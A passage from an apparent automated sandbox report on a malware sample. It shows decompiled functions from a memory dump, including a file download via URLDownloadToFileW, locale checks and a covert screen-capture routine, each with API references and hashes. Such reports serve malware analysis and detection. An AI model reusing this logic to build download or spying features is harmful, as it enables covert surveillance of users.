                                                                                                					_t98 = _t97 + 1;
                                                                                                					_t67 = _t62 + _t108;
                                                                                                					 *((intOrPtr*)(_t109 - 0x1ffbec3)) =  *((intOrPtr*)(_t109 - 0x1ffbec3)) + _t98;
                                                                                                					 *((intOrPtr*)(_t116 + _t109)) =  *((intOrPtr*)(_t116 + _t109)) + _t98;
                                                                                                					 *_t72 =  *_t72 + _t108;
                                                                                                					_t94 = _t98 + 1 + _t67;
                                                                                                					asm("out dx, al");
                                                                                                					asm("adc al, [ecx]");
                                                                                                					asm("adc al, [edx]");
                                                                                                					_t108 = _t108 +  *_t108;
                                                                                                					_t62 = _t67 + 5;
                                                                                                					_push(es);
                                                                                                				}
                                                                                                				_pop(es);
                                                                                                				asm("adc dl, [edx]");
                                                                                                				asm("adc cl, [eax]");
                                                                                                				 *_t108 =  *_t108 | _t94;
                                                                                                				asm("adc cl, [ebx]");
                                                                                                				asm("adc dl, [edx]");
                                                                                                				asm("adc dl, [edx]");
                                                                                                				asm("adc dl, [edx]");
                                                                                                				asm("adc dl, [edx]");
                                                                                                				asm("adc [esi-0x75], edx");
                                                                                                				_push(_t110);
                                                                                                				E004047EF(0);
                                                                                                				return _t94;
                                                                                                			}































                                                                                                0x00413f47
                                                                                                0x00413f47
                                                                                                0x00413f48
                                                                                                0x00413f49
                                                                                                0x00413f4b
                                                                                                0x00413f4d
                                                                                                0x00413f4f
                                                                                                0x00413f53
                                                                                                0x00413f55
                                                                                                0x00413f57
                                                                                                0x00413f5e
                                                                                                0x00413f60
                                                                                                0x00413f61
                                                                                                0x00413f69
                                                                                                0x00413f71

                                                                                                APIs
                                                                                                • Sleep.KERNEL32 ref: 00413478
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004134DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadFileSleep
                                                                                                • String ID:
                                                                                                • API String ID: 1931167962-0
                                                                                                • Opcode ID: 374d7494772fcb54fb22f0e3f905a91e2fb7e260f72e85f0dff5b57a84a5e570
                                                                                                • Instruction ID: a6d5dc11dd979872b0cac11f331f754c96155ea3453581b37262b410353ea2f2
                                                                                                • Opcode Fuzzy Hash: 374d7494772fcb54fb22f0e3f905a91e2fb7e260f72e85f0dff5b57a84a5e570
                                                                                                • Instruction Fuzzy Hash: A511B7716083015BC714FFB2DC969AE77A4AF51308F40097FF846960E2EF7C9949C65A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E0044B7E3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				short _v248;
                                                                                                				void* __ebp;
                                                                                                				signed int _t16;
                                                                                                				signed int _t22;
                                                                                                				void* _t24;
                                                                                                				void* _t31;
                                                                                                				void* _t35;
                                                                                                				signed int* _t50;
                                                                                                				int _t53;
                                                                                                				signed int _t54;
                                                                                                
                                                                                                				_t16 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t16 ^ _t54;
                                                                                                				_t35 = E00442F68(__ebx, __ecx, __edx);
                                                                                                				_t50 =  *(E00442F68(_t35, __ecx, __edx) + 0x34c);
                                                                                                				_t53 = E0044B8BB(_a4);
                                                                                                				asm("sbb ecx, ecx");
                                                                                                				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                                                                				if(_t22 != 0) {
                                                                                                					_t24 = E0044E1A1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                                                                                                					if(_t24 != 0) {
                                                                                                						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
                                                                                                							_t31 = E0044E1A1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                                                                                                							if(_t31 == 0) {
                                                                                                								_push(_t50);
                                                                                                								_push(_t31);
                                                                                                								goto L9;
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						if( *(_t35 + 0x60) != _t24) {
                                                                                                							L10:
                                                                                                							 *_t50 =  *_t50 | 0x00000004;
                                                                                                							_t50[1] = _t53;
                                                                                                							_t50[2] = _t53;
                                                                                                						} else {
                                                                                                							_push(_t50);
                                                                                                							_push(1);
                                                                                                							L9:
                                                                                                							_push(_t53);
                                                                                                							if(E0044BA13(_t35) != 0) {
                                                                                                								goto L10;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *_t50 =  *_t50 & _t22;
                                                                                                				}
                                                                                                				return E00430A5B(_v8 ^ _t54);
                                                                                                			}















                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442FC7
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B837
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: ca68c6d01fcc24e129668e9dafec227d227110ca5be198b28b3e6f360603ae01
                                                                                                • Instruction ID: 4883689988dfa2bd060ce291fedfd87b5dd127c4c2c23a0e55befbbcb8e090ac
                                                                                                • Opcode Fuzzy Hash: ca68c6d01fcc24e129668e9dafec227d227110ca5be198b28b3e6f360603ae01
                                                                                                • Instruction Fuzzy Hash: 3921D37260020AABFF24AE25DC42ABB77ACEB44315F1001BFF805D6241EB78DD45CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E0044B46B(void* __ecx, void* __edx, signed int* _a4) {
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t26;
                                                                                                				intOrPtr _t29;
                                                                                                				signed int _t32;
                                                                                                				signed char _t33;
                                                                                                				signed char _t34;
                                                                                                				void* _t36;
                                                                                                				intOrPtr* _t39;
                                                                                                				intOrPtr* _t42;
                                                                                                				signed int _t48;
                                                                                                				void* _t51;
                                                                                                				void* _t52;
                                                                                                				signed int* _t53;
                                                                                                				void* _t54;
                                                                                                				signed int _t62;
                                                                                                
                                                                                                				_t54 = E00442F68(_t36, __ecx, __edx);
                                                                                                				_t48 = 2;
                                                                                                				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                                                                                                				_t51 = _t39 + 2;
                                                                                                				do {
                                                                                                					_t26 =  *_t39;
                                                                                                					_t39 = _t39 + _t48;
                                                                                                				} while (_t26 != 0);
                                                                                                				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                                                                                                				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                                                                                                				_t52 = _t42 + 2;
                                                                                                				do {
                                                                                                					_t29 =  *_t42;
                                                                                                					_t42 = _t42 + _t48;
                                                                                                				} while (_t29 != 0);
                                                                                                				_t53 = _a4;
                                                                                                				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                                                                                                				_t53[1] = 0;
                                                                                                				if( *(_t54 + 0x60) == 0) {
                                                                                                					_t48 = E0044B567( *((intOrPtr*)(_t54 + 0x50)));
                                                                                                				}
                                                                                                				 *(_t54 + 0x5c) = _t48;
                                                                                                				_t32 = EnumSystemLocalesW(E0044B593, 1);
                                                                                                				_t62 =  *_t53 & 0x00000007;
                                                                                                				asm("bt ecx, 0x9");
                                                                                                				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                                                                                                				asm("bt ecx, 0x8");
                                                                                                				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                                                                                                				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                                                                                                					 *_t53 = 0;
                                                                                                					return _t34;
                                                                                                				}
                                                                                                				return _t34;
                                                                                                			}




















                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • EnumSystemLocalesW.KERNEL32(0044B593,00000001,00000000,?,0043F5A1,?,0044BBC0,00000000,?,?,?), ref: 0044B4DD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 2834af847882fa2f6e039046bccdb1f0bf951b73f06b5d90b37e1c263ad03e48
                                                                                                • Instruction ID: a3673f804c47cda1b416b90d5a5dff247ef08c8184ae1175a6835ed20c2b628c
                                                                                                • Opcode Fuzzy Hash: 2834af847882fa2f6e039046bccdb1f0bf951b73f06b5d90b37e1c263ad03e48
                                                                                                • Instruction Fuzzy Hash: 3A1129362007015FEB189F39D89167AB792FF8435CB54442DE94647B41D775F942C784
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E0044BA13(void* __ebx, signed int _a4, intOrPtr _a8) {
                                                                                                				short _v8;
                                                                                                				void* __ecx;
                                                                                                				void* __ebp;
                                                                                                				void* _t8;
                                                                                                				void* _t12;
                                                                                                				intOrPtr _t13;
                                                                                                				void* _t16;
                                                                                                				void* _t20;
                                                                                                				void* _t22;
                                                                                                				void* _t24;
                                                                                                				signed int _t27;
                                                                                                				intOrPtr* _t29;
                                                                                                
                                                                                                				_push(_t16);
                                                                                                				_t8 = E00442F68(__ebx, _t16, _t22);
                                                                                                				_t27 = _a4;
                                                                                                				_t24 = _t8;
                                                                                                				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                                                                                                					if(_t27 == _v8 || _a8 == 0) {
                                                                                                						L7:
                                                                                                						_t12 = 1;
                                                                                                					} else {
                                                                                                						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                                                                                                						_t20 = _t29 + 2;
                                                                                                						do {
                                                                                                							_t13 =  *_t29;
                                                                                                							_t29 = _t29 + 2;
                                                                                                						} while (_t13 != 0);
                                                                                                						if(E0044B567( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                                                                                                							goto L1;
                                                                                                						} else {
                                                                                                							goto L7;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					_t12 = 0;
                                                                                                				}
                                                                                                				return _t12;
                                                                                                			}
















                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044B7B1,00000000,00000000,?), ref: 0044BA3F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: 1df243cee8360a8245b836b1d21f77b96c9f1cd7b6a2f688ca4746fff15e7596
                                                                                                • Instruction ID: 267ac3bbd4bcd688a69e1ea16a55a09bfb8a1038d8ef0e2165b6f821a0fe1107
                                                                                                • Opcode Fuzzy Hash: 1df243cee8360a8245b836b1d21f77b96c9f1cd7b6a2f688ca4746fff15e7596
                                                                                                • Instruction Fuzzy Hash: 6EF0F936500115BFEB289A65C8067BB77A8EB40758F04446AFC59B3240EB78FE52C6D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0044B506(void* __ecx, void* __edx, signed char* _a4) {
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t11;
                                                                                                				signed int _t13;
                                                                                                				signed char* _t15;
                                                                                                				void* _t17;
                                                                                                				intOrPtr* _t20;
                                                                                                				intOrPtr _t25;
                                                                                                				void* _t26;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t27 = E00442F68(_t17, __ecx, __edx);
                                                                                                				_t25 = 2;
                                                                                                				_t20 =  *((intOrPtr*)(_t27 + 0x50));
                                                                                                				_t26 = _t20 + 2;
                                                                                                				do {
                                                                                                					_t11 =  *_t20;
                                                                                                					_t20 = _t20 + _t25;
                                                                                                				} while (_t11 != 0);
                                                                                                				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
                                                                                                				 *(_t27 + 0x60) = _t13;
                                                                                                				if(_t13 == 0) {
                                                                                                					_t25 = E0044B567( *((intOrPtr*)(_t27 + 0x50)));
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
                                                                                                				EnumSystemLocalesW(E0044B7E3, 1);
                                                                                                				_t15 = _a4;
                                                                                                				if(( *_t15 & 0x00000004) == 0) {
                                                                                                					 *_t15 = 0;
                                                                                                					return _t15;
                                                                                                				}
                                                                                                				return _t15;
                                                                                                			}














                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • EnumSystemLocalesW.KERNEL32(0044B7E3,00000001,?,?,0043F5A1,?,0044BB84,0043F5A1,?,?,?,?,?,0043F5A1,?,?), ref: 0044B552
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: b4792a74760ef4de9a6b3efe77471714ad7da75a8631f98d6413e5785f997c91
                                                                                                • Instruction ID: e093ffcd1a57556c947852d68d87e69df4d90f28677438228c844fb72df21d41
                                                                                                • Opcode Fuzzy Hash: b4792a74760ef4de9a6b3efe77471714ad7da75a8631f98d6413e5785f997c91
                                                                                                • Instruction Fuzzy Hash: 68F0AF362003046FEB249E399C81B7ABB95EF8076CF55442EF9458B690D7B5D9428684
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E00443157(void* __eflags) {
                                                                                                				int _t15;
                                                                                                				void* _t28;
                                                                                                
                                                                                                				E004308A0(0x469430, 0xc);
                                                                                                				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                                                                                                				E004403BD( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                                                                                                				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                                                                                                				 *0x46d728 = E0043EC2D( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                                                                                                				_t15 = EnumSystemLocalesW(E00443111, 1);
                                                                                                				_push(0x20);
                                                                                                				asm("ror eax, cl");
                                                                                                				 *0x46d728 = 0 ^  *0x46c00c;
                                                                                                				 *(_t28 - 0x1c) = _t15;
                                                                                                				 *(_t28 - 4) = 0xfffffffe;
                                                                                                				E004431CF();
                                                                                                				return E004308E6();
                                                                                                			}






                                                                                                APIs
                                                                                                  • Part of subcall function 004403BD: EnterCriticalSection.KERNEL32(?,?,0043DB54,00000000,00469288,0000000C,0043DB0F,?,?,?,0044065B,?,?,0044301D,00000001,00000364), ref: 004403CC
                                                                                                • EnumSystemLocalesW.KERNEL32(00443111,00000001,00469430,0000000C), ref: 0044318F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: c3ab90c1b19eddda106406a361ec7550520fda4e3b911b3704e0838e1d06168f
                                                                                                • Instruction ID: dc7c6ea09f487e144a9768f5fcd245d54a3073a5771f399359e22bc5bd9b1ceb
                                                                                                • Opcode Fuzzy Hash: c3ab90c1b19eddda106406a361ec7550520fda4e3b911b3704e0838e1d06168f
                                                                                                • Instruction Fuzzy Hash: 5AF04471A10200DFDB00EF65D846B5D77E0EB08729F10512AF410DB292D7B949508F5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0044B420(void* __ecx, void* __edx, signed char* _a4) {
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t9;
                                                                                                				signed char* _t13;
                                                                                                				void* _t14;
                                                                                                				intOrPtr* _t16;
                                                                                                				void* _t20;
                                                                                                				void* _t22;
                                                                                                
                                                                                                				_t20 = E00442F68(_t14, __ecx, __edx);
                                                                                                				_t16 =  *((intOrPtr*)(_t20 + 0x54));
                                                                                                				_t22 = _t16 + 2;
                                                                                                				do {
                                                                                                					_t9 =  *_t16;
                                                                                                					_t16 = _t16 + 2;
                                                                                                				} while (_t9 != 0);
                                                                                                				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
                                                                                                				EnumSystemLocalesW(0x44b377, 1);
                                                                                                				_t13 = _a4;
                                                                                                				if(( *_t13 & 0x00000004) == 0) {
                                                                                                					 *_t13 = 0;
                                                                                                					return _t13;
                                                                                                				}
                                                                                                				return _t13;
                                                                                                			}











                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • EnumSystemLocalesW.KERNEL32(0044B377,00000001,?,?,?,0044BBE2,0043F5A1,?,?,?,?,?,0043F5A1,?,?,?), ref: 0044B457
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E0040D22F(void* __ecx) {
                                                                                                				char _v8;
                                                                                                				void* _t8;
                                                                                                				void* _t12;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t12 = __ecx;
                                                                                                				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                                                                                                				E00402076(_t8, _t12,  &_v8);
                                                                                                				return _t12;
                                                                                                			}







                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00412852,0046E250,pf,0046E250,00000000,0046E250,00000000,0046E250,3.3.2 Pro), ref: 0040D243
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0044901D() {
                                                                                                				signed int _t3;
                                                                                                
                                                                                                				_t3 = GetProcessHeap();
                                                                                                				 *0x46da48 = _t3;
                                                                                                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                			}





                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 81%
                                                                                                			E004152EA(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                                                                                                				void* _v12;
                                                                                                				char _v13;
                                                                                                				struct HDC__* _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				int _v32;
                                                                                                				int _v36;
                                                                                                				struct HDC__* _v40;
                                                                                                				void* _v46;
                                                                                                				intOrPtr _v50;
                                                                                                				intOrPtr _v54;
                                                                                                				char _v56;
                                                                                                				char _v80;
                                                                                                				intOrPtr _v84;
                                                                                                				struct tagCURSORINFO _v100;
                                                                                                				signed int _v106;
                                                                                                				signed int _v108;
                                                                                                				long _v116;
                                                                                                				long _v120;
                                                                                                				char _v124;
                                                                                                				struct _ICONINFO _v144;
                                                                                                				char _v168;
                                                                                                				void* __ebx;
                                                                                                				int _t114;
                                                                                                				void* _t115;
                                                                                                				void* _t116;
                                                                                                				void* _t120;
                                                                                                				int _t127;
                                                                                                				void* _t128;
                                                                                                				signed char _t140;
                                                                                                				long _t146;
                                                                                                				void* _t147;
                                                                                                				int _t149;
                                                                                                				void* _t157;
                                                                                                				void* _t186;
                                                                                                				void* _t188;
                                                                                                				void* _t194;
                                                                                                				int _t199;
                                                                                                				void* _t204;
                                                                                                				void* _t223;
                                                                                                				signed int _t226;
                                                                                                				struct HDC__* _t228;
                                                                                                				struct HDC__* _t232;
                                                                                                				struct tagBITMAPINFO* _t234;
                                                                                                				void* _t235;
                                                                                                				int _t241;
                                                                                                
                                                                                                				_v13 = __edx;
                                                                                                				_t194 = __ecx;
                                                                                                				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                                				_v20 = _t232;
                                                                                                				_t228 = CreateCompatibleDC(_t232);
                                                                                                				_v40 = _t228;
                                                                                                				_v32 = E00415721( *((intOrPtr*)(0x46dd68 + _a4 * 4)));
                                                                                                				_t114 = E0041576D( *((intOrPtr*)(0x46dd68 + _a4 * 4)));
                                                                                                				_t199 = _v32;
                                                                                                				_v36 = _t114;
                                                                                                				if(_t199 != 0 || _t114 != 0) {
                                                                                                					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                                                                                                					_v12 = _t115;
                                                                                                					__eflags = _t115;
                                                                                                					if(_t115 != 0) {
                                                                                                						_t116 = SelectObject(_t228, _t115);
                                                                                                						__eflags = _t116;
                                                                                                						if(_t116 != 0) {
                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                							E004157AE( *((intOrPtr*)(0x46dd68 + _a4 * 4)),  &_v28);
                                                                                                							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                                                                                                							__eflags = _t120;
                                                                                                							if(_t120 == 0) {
                                                                                                								goto L7;
                                                                                                							}
                                                                                                							__eflags = _v13;
                                                                                                							if(_v13 != 0) {
                                                                                                								_v100.cbSize = 0x14;
                                                                                                								_t186 = GetCursorInfo( &_v100);
                                                                                                								__eflags = _t186;
                                                                                                								if(_t186 != 0) {
                                                                                                									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                                                                                                									__eflags = _t188;
                                                                                                									if(_t188 != 0) {
                                                                                                										_t241 = _v84 - _v144.yHotspot - _v24;
                                                                                                										__eflags = _t241;
                                                                                                										DeleteObject(_v144.hbmColor);
                                                                                                										DeleteObject(_v144.hbmMask);
                                                                                                										_t228 = _v40;
                                                                                                										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                                                                                                										_t232 = _v20;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_push( &_v124);
                                                                                                							_t127 = 0x18;
                                                                                                							_t128 = GetObjectA(_v12, _t127, ??);
                                                                                                							__eflags = _t128;
                                                                                                							if(_t128 == 0) {
                                                                                                								goto L7;
                                                                                                							} else {
                                                                                                								_t226 = _v106 * _v108 & 0x0000ffff;
                                                                                                								__eflags = _t226 - 1;
                                                                                                								if(_t226 != 1) {
                                                                                                									_push(4);
                                                                                                									_pop(1);
                                                                                                									_a4 = 1;
                                                                                                									__eflags = _t226 - 1;
                                                                                                									if(_t226 <= 1) {
                                                                                                										L24:
                                                                                                										__eflags = 1 << 1;
